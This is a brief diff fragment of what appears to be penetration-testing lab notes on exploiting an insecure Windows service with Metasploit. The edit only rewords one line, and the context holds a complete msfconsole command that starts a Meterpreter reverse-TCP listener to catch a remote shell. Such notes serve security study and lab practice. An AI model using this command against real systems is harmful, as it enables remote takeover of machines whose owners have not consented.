Exploiting Insecure Service with Metasploit¶

 -

-Start your listener on the attacking machine
+Start a listener on the attacking machine

 msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"